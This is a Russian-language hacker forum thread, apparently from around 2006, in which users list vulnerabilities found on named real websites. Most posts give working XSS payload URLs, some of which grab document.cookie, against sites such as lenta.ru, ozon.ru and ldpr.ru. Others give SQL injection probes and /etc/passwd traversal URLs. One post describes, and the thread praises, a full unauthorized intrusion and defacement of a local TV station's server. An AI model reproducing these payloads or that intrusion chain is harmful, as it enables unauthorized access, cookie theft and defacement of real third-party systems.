+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 20 из 21

Тема: НашЪ BugTraq

  1. #1
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Уязвимость, очень похожая на SQL-injection, нашел сегодня на сайте www.nix.ru (оф. партнер одной кампутерной правобережной фирмы)
    Код HTML:
    http://nix.ru/news/news_viewer.html?id=1%27
    или например так
    Код HTML:
    http://nix.ru/news/news_viewer.html?id=1+1
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  2. #2
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    Уязвимость, очень похожая на SQL-injection, нашел сегодня на сайте www.nix.ru (оф. партнер одной кампутерной правобережной фирмы)
    Код HTML:
    http://nix.ru/news/news_viewer.html?id=1%27
    или например так
    Код HTML:
    http://nix.ru/news/news_viewer.html?id=1+1
    и еще только что нашел XSS багу

    в общем виде:
    Код HTML:
    http://nix.ru/support/request/check.php?serial_number=***91;XSS***93;
    например
    Код HTML:
    http://nix.ru/support/request/check.php?serial_number=%3Cscript%3Ealert(%27special%20for%20IST%20by%20***91;n0ns3ns3***93;%27)%3C/script%3E
    ;)
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  3. #3
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    сайт ТрансТелеКом-Байкал www.bttc.ru

    Код HTML:
    http://www.bttc.ru/asp/news.asp?noparma=ziwk&mode=show&gid=191.%272
    = SQL-inj
    by nonS
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  4. #4
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    сайт телекомпании БСТ www.bst.bratsk.ru

    Код HTML:
    http://bst.bratsk.ru/search/?string=%22%3E%3Cscript%3Ealert("hi all from nonS")%3C/script%3E
    =XSS


    сайт allbratsk.ru www.allbratsk.ru
    Код HTML:
    http://allbratsk.ru/photo.php?gal=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
    =XSS

    by nonS
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  5. #5
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    дело было вечером, делать было нечего

    сайт lenta.ru www.lenta.ru

    Код HTML:
    http://lenta.ru/Search?Search=%22%3E%3CSCRIPT%3Ealert(%27hi%20all%20from%20nonS%20%)%27)%3C/SCRIPT%3E
    =XSS
    мелочь, а приятно
    by nonS
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  6. #6
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Ozon.ru туда же

    Код HTML:
    http://www.ozon.ru/?context=all_search_list&searchstring=%22%3E%3Cscript%3ealert(%22by%20Vanda%22);%3C/script%3E
    =XSS

  7. #7
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    /me пора лечицца :(

    сайт телекомпании БСТ www.bst.bratsk.ru

    Код HTML:
    http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
    =XSS + SQL-inj
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  8. #8
    Всея Руси Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Ыгзук Разбег по полосе Аватар для Ыгзук
    Регистрация
    23.03.2005
    Адрес
    the Bratsk
    Возраст
    35
    Сообщений
    3,006
    Поблагодарил(а)
    208
    Получено благодарностей: 1,268 (сообщений: 684).

    По умолчанию

    Цитата Сообщение от n0ns3ns3
    /me пора лечицца :(

    сайт телекомпании БСТ www.bst.bratsk.ru

    Код HTML:
    http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
    =XSS + SQL-inj

    Оффтопик
    Всех люблю

  9. #9
    Новичок sektor кто это? Аватар для sektor
    Регистрация
    07.03.2006
    Возраст
    39
    Сообщений
    37
    Поблагодарил(а)
    1
    Получено благодарностей: 11 (сообщений: 4).

    По умолчанию

    Вот решил молодость вспомнить
    Захотелось проверить так же Гугль функционален (в плане запросов), и вот результаты найденны за 20 минут:

    Код HTML:
    http://www.pioneerlocal.com/cgi-bin/ppo-movierev?moviewhat=/../../../../../../../../../etc/passwd
    Код HTML:
    http://www.perlhelp.com/cgi-bin/perl-html.cgi?out=../../../../../../etc/passwd
    Код HTML:
    http://tinman.snell.clarkson.edu/~horn/bin2/showscripts2.cgi?showscripts2.cgi
    -------------------------------------------------------------------
    Код HTML:
    http://money.dp.ua/test.php
    Код HTML:
    http://www.ourdocuments.gov/content.php?page=../
    - это так для разведки сойдет

    Будет время еще че-нить накопаю

  10. #10
    s4SSn
    Guest

    По умолчанию

    уууу... аська тоже в xss...

    http://www.icq.com/boards/search_results.php?uSearchString=%3Cscript%3Ealert %28%27123%27%29%3B%3C%2Fscript%3E

  11. #11
    s4SSn
    Guest

    По умолчанию

    ыыыы... рамблер...
    ==
    http://www.rambler.ru/doc/feedback.shtml - вводим везде <script>alert('test')</script> и удивляемся как нынче не внимательны кодеры к xss

  12. #12
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    сайт вроде как Братской студии web дезигна www.stilia.ru
    и нашел я там множественные XSS

    пример:
    http://www.stilia.ru/index.php?option=com_search&Itemid=5&searchword="> <script>alert(document.cookie)</script>
    или
    http://www.stilia.ru/index.php?option=com_glossary&Itemid=75"><script>a lert(document.cookie)</script>
    общий вид:
    http://www.stilia.ru/index.php?option=com_glossary&Itemid=ID">[XSS]
    ID - любое ID раздела сайта

    на сайте есть форум, так что сами думайте к чему это может привести
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  13. #13
    s4SSn
    Guest

    По умолчанию

    вчера была найдена xss на чате дикий остров...
    после связи с администрацией чата (читай с данивчиком) ошибка была устранена

  14. #14
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    опять мне не спицца
    банально, но XSS на сайте ЛДПР
    http://www.ldpr.ru/search/?action=index&text=%27%3E%3Cscript%3Ealert(documen t.cookie);%3C/script%3E
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  15. #15
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    всеми известный holm.ru

    Код HTML:
    http://www.holm.ru/cgi-bin/hselect.cgi?user=%22%3E%3Cscript%3Ealert(%27hi%20from%20nons%27)%3C/script%3E
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  16. #16
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    Red face

    уф, на каждом втором сайте xss есть
    вот нашел даже на www.cnews.ru -

    Код HTML:
    http://www.cnews.ru/search.shtml?query=text&cat=&d1=01%22%3E%3Cscript%3Ealert(%27XSS%20founded%20by%20nons%27)%3C/script%3E&m1=01&y1=1998&d2=09&m2=04&y2=2006
    и на www.ren-tv.com -

    Код HTML:
    http://www.ren-tv.com/search/index.php?terms=%22%3E%3Cscript%3Ealert(%22LOL%20=)%22)%3C/script%3E
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  17. #17
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    по сути фигня, но XSS на офф. сайте города (%

    Код HTML:
    http://www.bratsk-city.ru/index.php?newsid=%22%3E%3Cscript%3Ealert(%27by%20nons%27)%3C/script%3E
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  18. #18
    Новичок e.s.t кто это?
    Регистрация
    24.05.2006
    Сообщений
    12
    Поблагодарил(а)
    0
    Получено благодарностей: 0 (сообщений: 0).

    По умолчанию

    Цитата Сообщение от nons
    /me пора лечицца :(

    сайт телекомпании БСТ www.bst.bratsk.ru

    Код HTML:
    http://bst.bratsk.ru/news/archive/?id=1908%22%3E%3Cscript%3Ealert(%22hi%20from%20nonS%22)%3C/script%3E
    =XSS + SQL-inj
    может кому-нибудь будет интересно.
    админы этого ресурса вообще сплоховали.
    во-первых какое то время админка этого сайта была просто открыта и не запаролена. php был в safe-mode, с админки под видом анонса заливался скрипт использующий багу в пхп, который позволил побродить по файловой системе, и обнаружить ляп №2. а именно диру пользователя test в /home. после чего под логином test:test можно было законнектиться на фтп и использовать ляп №3, пользователь небыл в chroot'e (в отличии от юзера webmaster). с правами nobody слились исходники сайта, откуда был взят пассворд от мускуля, который как ни странно подошёл к пользователю webmaster (ляп №4) . после чего была оставлена записка админу с его ошибкой, и сделан небольшой дефейс.
    в /etc/passwd фигурировали админы довольно опытные, странно что они допустили ряд таких элементарных ошибок.

    ps: сорри за оффтоп.

  19. #19
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цитата Сообщение от e.s.t
    может кому-нибудь будет интересно.
    админы этого ресурса вообще сплоховали.
    во-первых какое то время админка этого сайта была просто открыта и не запаролена. php был в safe-mode, с админки под видом анонса заливался скрипт использующий багу в пхп, который позволил побродить по файловой системе, и обнаружить ляп №2. а именно диру пользователя test в /home. после чего под логином test:test можно было законнектиться на фтп и использовать ляп №3, пользователь небыл в chroot'e (в отличии от юзера webmaster). с правами nobody слились исходники сайта, откуда был взят пассворд от мускуля, который как ни странно подошёл к пользователю webmaster (ляп №4) . после чего была оставлена записка админу с его ошибкой, и сделан небольшой дефейс.
    в /etc/passwd фигурировали админы довольно опытные, странно что они допустили ряд таких элементарных ошибок.

    ps: сорри за оффтоп.
    многие достаточно опытные как правило на мелочах и прокалываются (%

    ЗЫ зачотно, пиши еще (;
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  20. #20
    Гений qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе qwas Разбег по полосе Аватар для qwas
    Регистрация
    09.11.2005
    Адрес
    7-ой
    Возраст
    40
    Сообщений
    2,949
    Поблагодарил(а)
    1,528
    Получено благодарностей: 1,680 (сообщений: 621).

    По умолчанию

    Цитата Сообщение от nons

    многие достаточно опытные как правило на мелочах и прокалываются (%

    ЗЫ зачотно, пиши еще (;
    нихрена сибе мелоч. Админка милости просим

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.